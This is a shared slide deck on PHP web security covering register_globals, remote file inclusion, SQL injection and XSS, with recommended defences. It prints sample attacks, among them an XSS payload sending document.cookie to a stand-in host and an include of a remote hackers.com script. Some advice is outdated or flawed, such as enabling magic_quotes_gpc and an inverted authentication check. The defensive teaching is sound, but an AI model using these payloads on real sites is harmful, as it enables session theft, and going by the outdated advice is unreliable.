Uploaded byssrajsathya
PPT, PDF618 views

Php security

The document discusses various PHP security concerns such as SQL injection, cross-site scripting, and code injection. It recommends validating all user input, disabling register globals, using prepared statements, and encoding output to prevent attacks. Proper server configuration and input sanitization are important defenses against security vulnerabilities.

Downloaded 35 times
 
Importance of PHP Security Concerns of PHP Security Input Validation Register Global Code Injection SQL injection Cross-site Scripting (XSS)
Protect server from crash Prevent malicious user have root access Protect customer data
All User Inputs are unreliable and can’t be trusted Solution: Need to Validate any user input before use Validation on the client side is good for the user Validation on the server side is good for security
When “ register_globals” is set ON, un-initialized variable can be injected via user inputs Example <?php if(authenticate_user()) { $authenticated = true; } - - - - - if($authenticated) { die(“Authentication required”); } ?> If set $authenticated to 1 via GET, http://ffs.com/admin.php?authenticated=1
Set “ register_globals” Off in php.ini(Disabled by default in versions >= 4.1.0) Alternative to Register Global : SUPER GLOBALS $_GET – data from get requests $_POST – post request data $_COOKIES – cookie information $_FILES – upload file data $_SERVER - server data $_ENV – environment variable $_REQUEST – mix of GET, POST, COOKIE
Dynamic paths/files used in require/include statements Example: <?php include “{$_GET[‘path’]}/script.php”; ?> I f set $path to “http://www.hackers.com” via GET, <?php include “http://www.hackers.com/script.php”; ?> Avoid using dynamic paths Always use full path, defined by constants
Allow a Malicious SQL code on server Allow Malicious user have root access Removal of data Modification of existing values Denial of service
MYSQL Prepared Statement - using mysqli::prepare() Validate input data before send to the database addslashes(), mysql_real_escape() magic_quotes_gpc - Set to ON error_reporting - Set to E_ALL display_error – Set to ON in development, OFF in production log_errors – Set to ON in production error_log – Set to the desired location of the error log
Inject HTML/Script in a page, Pass a request to another Site Session take-over Password theft User tracking by 3 rd Parties Example: <script>document.location = &quot;http://cookiehaker.com/xss.php?&quot;+document.cookie</script>
Server Side Validation for all Input Data htmlspecialchars() – encodes ‘,”,<,>,& htmlentities() – Convert all applicable chars to HTML entities strip_tags() – Remove HTML and PHP tags
XSS Me - https://addons.mozilla.org/en-US/firefox/addon/7598/ Web Developer Tool Firefox – https://addons.mozilla.org/en-US/firefox/addon/60/ IE - http://www.microsoft.com/downloads/details.aspx? FamilyID=E59C3964-672D-4511-BB3E-2D5E1DB91038 Firebug - https://addons.mozilla.org/en-US/firefox/addon/1843/
 
 

More Related Content

PDF
Tecnologias Open Source para Alta Disponibilidade e Segurança de Aplicações Web
byAlexandro Silva
 
PPTX
Ajax basics
byHernán Garzón de la Roza
 
TXT
Inline
byekeoguob
 
PDF
自社サービスのAPIをOAuth2対応にして公開した
byMaki Toshio
 
PPT
php $_GET / $_POST / $_SESSION
bytumetr1
 
PDF
Subresource Integrity
byPhilippe De Ryck
 
PDF
500 Internal Server Error
bymcafeemtpretailcard2014
 
PPT
Securing Java EE Web Apps
byFrank Kim
 
Tecnologias Open Source para Alta Disponibilidade e Segurança de Aplicações Web
byAlexandro Silva
 
Ajax basics
byHernán Garzón de la Roza
 
Inline
byekeoguob
 
自社サービスのAPIをOAuth2対応にして公開した
byMaki Toshio
 
php $_GET / $_POST / $_SESSION
bytumetr1
 
Subresource Integrity
byPhilippe De Ryck
 
500 Internal Server Error
bymcafeemtpretailcard2014
 
Securing Java EE Web Apps
byFrank Kim
 

Similar to Php security

PPT
Php My Sql Security 2007
byAung Khant
 
PPS
Php security3895
byPrinceGuru MS
 
PPS
PHP Security
bymanugoel2003
 
PPS
Php Security3895
byAung Khant
 
PPT
Php Security By Mugdha And Anish
byOSSCube
 
PPT
Security.ppt
bywebhostingguy
 
PPT
12-security.ppt - PHP and Arabic Language - Index
bywebhostingguy
 
PPT
PHPUG Presentation
byDamon Cortesi
 
PPT
Php & Web Security - PHPXperts 2009
bymirahman
 
PPTX
Secure Programming In Php
byAkash Mahajan
 
PPT
PHP Security
byMindfire Solutions
 
PPT
Download It
bywebhostingguy
 
PPT
secure php
byRiyad Bin Zaman
 
PPT
Php Security
byAmit Kumar Singh
 
ODP
LAMP security practices
byAmit Kejriwal
 
PPT
Php security
byUttam Kumar
 
PPT
Eight simple rules to writing secure PHP programs
byAleksandr Yampolskiy
 
PDF
null Bangalore meet - Php Security
byn|u - The Open Security Community
 
ODP
My app is secure... I think
byWim Godden
 
PPS
Hacking - Web based attacks
byVNIT-ACM Student Chapter
 
Php My Sql Security 2007
byAung Khant
 
Php security3895
byPrinceGuru MS
 
PHP Security
bymanugoel2003
 
Php Security3895
byAung Khant
 
Php Security By Mugdha And Anish
byOSSCube
 
Security.ppt
bywebhostingguy
 
12-security.ppt - PHP and Arabic Language - Index
bywebhostingguy
 
PHPUG Presentation
byDamon Cortesi
 
Php & Web Security - PHPXperts 2009
bymirahman
 
Secure Programming In Php
byAkash Mahajan
 
PHP Security
byMindfire Solutions
 
Download It
bywebhostingguy
 
secure php
byRiyad Bin Zaman
 
Php Security
byAmit Kumar Singh
 
LAMP security practices
byAmit Kejriwal
 
Php security
byUttam Kumar
 
Eight simple rules to writing secure PHP programs
byAleksandr Yampolskiy
 
null Bangalore meet - Php Security
byn|u - The Open Security Community
 
My app is secure... I think
byWim Godden
 
Hacking - Web based attacks
byVNIT-ACM Student Chapter
 

Recently uploaded

PDF
Session 1 - Agentic Automation Building the Enterprise Agent of Tomorrow
byDianaGray10
 
PDF
Certificate of Completion For Getting Started With Azure
byNeel Patel
 
PDF
Certified Kubernetes Security Specialist (CKS): Unit 5
byVICTOR MAESTRE RAMIREZ
 
PPTX
Documenta11y’s Role in Healthcare Document Accessibility
bydocumenta11y
 
PDF
Supercharge your JVM performance with Project Leyden and Spring Boot
byAmmbra
 
PDF
TrustArc Webinar - The Future of Third-Party Privacy Risk: Trends, Tactics & ...
byTrustArc
 
PDF
Comprehensive Analysis of OpenAI's Strategic Transformation at DevDay 2025.pdf
byAlex Doan
 
PDF
A PROJECT ON EVOLUTION OF DNA FINGERPRINTING AND ITS TECHNOLOGY
bychandrakalasahu568
 
PDF
What Are AI Agentic Workflows? Unlock the Power of AI Agents in 2025!
byTeleglobal International
 
PDF
Unleash the Power of Salesforce Winter ’26 Release.pdf
byyoyoloftis
 
PDF
Dr. PANKAJ DHUSSA The near side of the Moon By NASA's Lunar Reconnaissance Or...
byDr. PANKAJ DHUSSA
 
PPTX
TechVerse Kent (Combining Tech, AI, Innovation and Creativity)
byKritarthDevli
 
PDF
Mapping Your Ecosystem: Uniting Content and Data across Systems
byRustici Software
 
PPTX
Unit 1- Strategies to AVOID ErrorsBias.pptx
byapurvshimpi02
 
PDF
Ultimate B2B Travel API Integration for Skyrocket Bookings
byanishadivaha
 
PDF
Readying Enterprise Networks for Artificial Intelligence
byEnterprise Management Associates
 
PDF
Phishing for Answers: A Tech Filler Quiz.pdf
byConquiztadors- the Quiz Society of Sri Venkateswara College
 
PDF
Session 1 - Specialized AI Associate Series: Essential Studio Automation Fea...
byDianaGray10
 
PDF
Dr. PANKAJ DHUSSA NASA 2025 INTERNATIONAL OBSERVE THE MOON NIGHT
byDr. PANKAJ DHUSSA
 
PDF
Unit 3 DS - Distributed Data Storage and Retrieval - PowerPoint Content.pdf
byayesha butalia
 
Session 1 - Agentic Automation Building the Enterprise Agent of Tomorrow
byDianaGray10
 
Certificate of Completion For Getting Started With Azure
byNeel Patel
 
Certified Kubernetes Security Specialist (CKS): Unit 5
byVICTOR MAESTRE RAMIREZ
 
Documenta11y’s Role in Healthcare Document Accessibility
bydocumenta11y
 
Supercharge your JVM performance with Project Leyden and Spring Boot
byAmmbra
 
TrustArc Webinar - The Future of Third-Party Privacy Risk: Trends, Tactics & ...
byTrustArc
 
Comprehensive Analysis of OpenAI's Strategic Transformation at DevDay 2025.pdf
byAlex Doan
 
A PROJECT ON EVOLUTION OF DNA FINGERPRINTING AND ITS TECHNOLOGY
bychandrakalasahu568
 
What Are AI Agentic Workflows? Unlock the Power of AI Agents in 2025!
byTeleglobal International
 
Unleash the Power of Salesforce Winter ’26 Release.pdf
byyoyoloftis
 
Dr. PANKAJ DHUSSA The near side of the Moon By NASA's Lunar Reconnaissance Or...
byDr. PANKAJ DHUSSA
 
TechVerse Kent (Combining Tech, AI, Innovation and Creativity)
byKritarthDevli
 
Mapping Your Ecosystem: Uniting Content and Data across Systems
byRustici Software
 
Unit 1- Strategies to AVOID ErrorsBias.pptx
byapurvshimpi02
 
Ultimate B2B Travel API Integration for Skyrocket Bookings
byanishadivaha
 
Readying Enterprise Networks for Artificial Intelligence
byEnterprise Management Associates
 
Phishing for Answers: A Tech Filler Quiz.pdf
byConquiztadors- the Quiz Society of Sri Venkateswara College
 
Session 1 - Specialized AI Associate Series: Essential Studio Automation Fea...
byDianaGray10
 
Dr. PANKAJ DHUSSA NASA 2025 INTERNATIONAL OBSERVE THE MOON NIGHT
byDr. PANKAJ DHUSSA
 
Unit 3 DS - Distributed Data Storage and Retrieval - PowerPoint Content.pdf
byayesha butalia
 

Php security

  • 1.
  • 2.
    Importance of PHPSecurity Concerns of PHP Security Input Validation Register Global Code Injection SQL injection Cross-site Scripting (XSS)
  • 3.
    Protect server fromcrash Prevent malicious user have root access Protect customer data
  • 4.
    All User Inputsare unreliable and can’t be trusted Solution: Need to Validate any user input before use Validation on the client side is good for the user Validation on the server side is good for security
  • 5.
    When “ register_globals” is set ON, un-initialized variable can be injected via user inputs Example <?php if(authenticate_user()) { $authenticated = true; } - - - - - if($authenticated) { die(“Authentication required”); } ?> If set $authenticated to 1 via GET, http://ffs.com/admin.php?authenticated=1
  • 6.
    Set “ register_globals”Off in php.ini(Disabled by default in versions >= 4.1.0) Alternative to Register Global : SUPER GLOBALS $_GET – data from get requests $_POST – post request data $_COOKIES – cookie information $_FILES – upload file data $_SERVER - server data $_ENV – environment variable $_REQUEST – mix of GET, POST, COOKIE
  • 7.
    Dynamic paths/files usedin require/include statements Example: <?php include “{$_GET[‘path’]}/script.php”; ?> I f set $path to “http://www.hackers.com” via GET, <?php include “http://www.hackers.com/script.php”; ?> Avoid using dynamic paths Always use full path, defined by constants
  • 8.
    Allow a MaliciousSQL code on server Allow Malicious user have root access Removal of data Modification of existing values Denial of service
  • 9.
    MYSQL Prepared Statement - using mysqli::prepare() Validate input data before send to the database addslashes(), mysql_real_escape() magic_quotes_gpc - Set to ON error_reporting - Set to E_ALL display_error – Set to ON in development, OFF in production log_errors – Set to ON in production error_log – Set to the desired location of the error log
  • 10.
    Inject HTML/Script ina page, Pass a request to another Site Session take-over Password theft User tracking by 3 rd Parties Example: <script>document.location = &quot;http://cookiehaker.com/xss.php?&quot;+document.cookie</script>
  • 11.
    Server Side Validationfor all Input Data htmlspecialchars() – encodes ‘,”,<,>,& htmlentities() – Convert all applicable chars to HTML entities strip_tags() – Remove HTML and PHP tags
  • 12.
    XSS Me - https://addons.mozilla.org/en-US/firefox/addon/7598/ Web Developer Tool Firefox – https://addons.mozilla.org/en-US/firefox/addon/60/ IE - http://www.microsoft.com/downloads/details.aspx? FamilyID=E59C3964-672D-4511-BB3E-2D5E1DB91038 Firebug - https://addons.mozilla.org/en-US/firefox/addon/1843/
  • 13.
  • 14.